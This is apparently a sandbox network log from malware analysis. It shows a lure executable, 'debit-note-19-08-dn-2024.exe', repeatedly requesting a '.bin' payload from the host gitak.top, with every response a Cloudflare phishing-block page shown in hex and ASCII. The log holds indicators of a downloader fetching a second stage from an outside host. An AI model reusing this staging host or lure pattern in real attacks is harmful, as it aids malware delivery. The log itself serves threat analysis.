2024-08-26 13:35:44 UTC	551	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:35:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUM%2FxtclieR%2BGKclI%2Fdf0IpXQlPawruoG24bmM52uCF5w02ovbcUapoykp9u%2B456m8%2F3%2FOaw588VblZgXL52LQu7oNbqFUdLKh0VRUfhYv%2BCpyTPXY%2FvZHwc%2Brk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9434ee4aa881b1-IAD
2024-08-26 13:35:44 UTC	818	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:35:44 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-08-26 13:35:44 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 65 6c 36 7a 6d 6b 73 78 41 61 66 46 50 70 73 79 45 54 51 73 2e 7a 4c 6d 74 4f 65 37 50 63 49 4c 31 4f 68 6c 34 34 71 33 74 6c 77 2d 31 37 32 34 36 37 39 33 34 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d Data Ascii: <input type="hidden" name="atok" value="el6zmksxAafFPpsyETQs.zLmtOe7PcIL1Ohl44q3tlw-1724679344-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class=
2024-08-26 13:35:44 UTC	862	IN	Data Raw: 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e Data Ascii: r-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">
2024-08-26 13:35:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.20	49838	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:35:54 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:35:54 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:35:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjOz9ww92CJuTyxuhNjtiieYVH7p39iJdOYjIj7oZZ6auVu6rzdQHi0E6TU1EWv2i%2F2%2BfBx%2FkiP56vUIAyM6PaEV5PoU74WRBug4SMpKUt1oyhJ7%2BwUeDv%2BjkbY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9435301eda0609-IAD
2024-08-26 13:35:54 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:35:54 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:35:54 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 65 73 37 5a 7a 36 5a 38 65 6e 6a 57 4c 5a 6a 39 32 52 54 42 77 47 58 38 30 78 49 57 65 37 36 56 65 4d 35 6e 2e 48 34 6e 34 59 59 2d 31 37 32 34 36 37 39 33 35 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="es7Zz6Z8enjWLZj92RTBwGX80xIWe76VeM5n.H4n4YY-1724679354-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:35:54 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:35:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.20	49839	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:36:05 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:36:05 UTC	541	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HN0vfXFIfvHVEcYM5DDxXz7N7%2FXAcxLE24vhcueBVzn1i3PTmkm3WgiwrSF8Nu8drwQu%2Bj41zkD3LFVnE4M16wZ5QdUsA1lz4bpQ9XrycDOL%2BqJFOs7Azmurb%2Fw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943571ed8658c0-IAD
2024-08-26 13:36:05 UTC	828	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:36:05 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-08-26 13:36:05 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 7a 71 32 65 6a 42 49 38 79 6f 6c 71 75 61 34 45 70 67 64 38 45 6a 44 32 5a 65 33 47 6f 4f 44 71 34 4e 5f 43 38 63 54 35 67 39 63 2d 31 37 32 34 36 37 39 33 36 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 Data Ascii: <input type="hidden" name="atok" value="zq2ejBI8yolqua4Epgd8EjD2Ze3GoODq4N_C8cT5g9c-1724679365-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
2024-08-26 13:36:05 UTC	852	IN	Data Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 Data Ascii: r sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
2024-08-26 13:36:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.20	49840	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:36:15 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:36:16 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:36:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mjO6YR2SkgyV62m9v%2FzLJHgcvdm0oCFwwl1ed7u8mXxx5X48%2FKPZgVwU7twNSjVfTej4YLBaBjayn7RAwT40qlB0gkl%2F6GPl9NMooR2pY0PePMIcznqjcqPXMuA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9435b3b864827b-IAD
2024-08-26 13:36:16 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:36:16 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:36:16 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 45 6a 68 55 70 30 63 5a 54 75 2e 46 50 47 4e 43 32 61 74 33 78 75 56 68 4d 73 55 37 44 4f 55 69 4d 6b 73 4a 36 33 54 59 4e 61 67 2d 31 37 32 34 36 37 39 33 37 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="EjhUp0cZTu.FPGNC2at3xuVhMsU7DOUiMksJ63TYNag-1724679375-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:36:16 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:36:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.20	49841	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:36:26 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
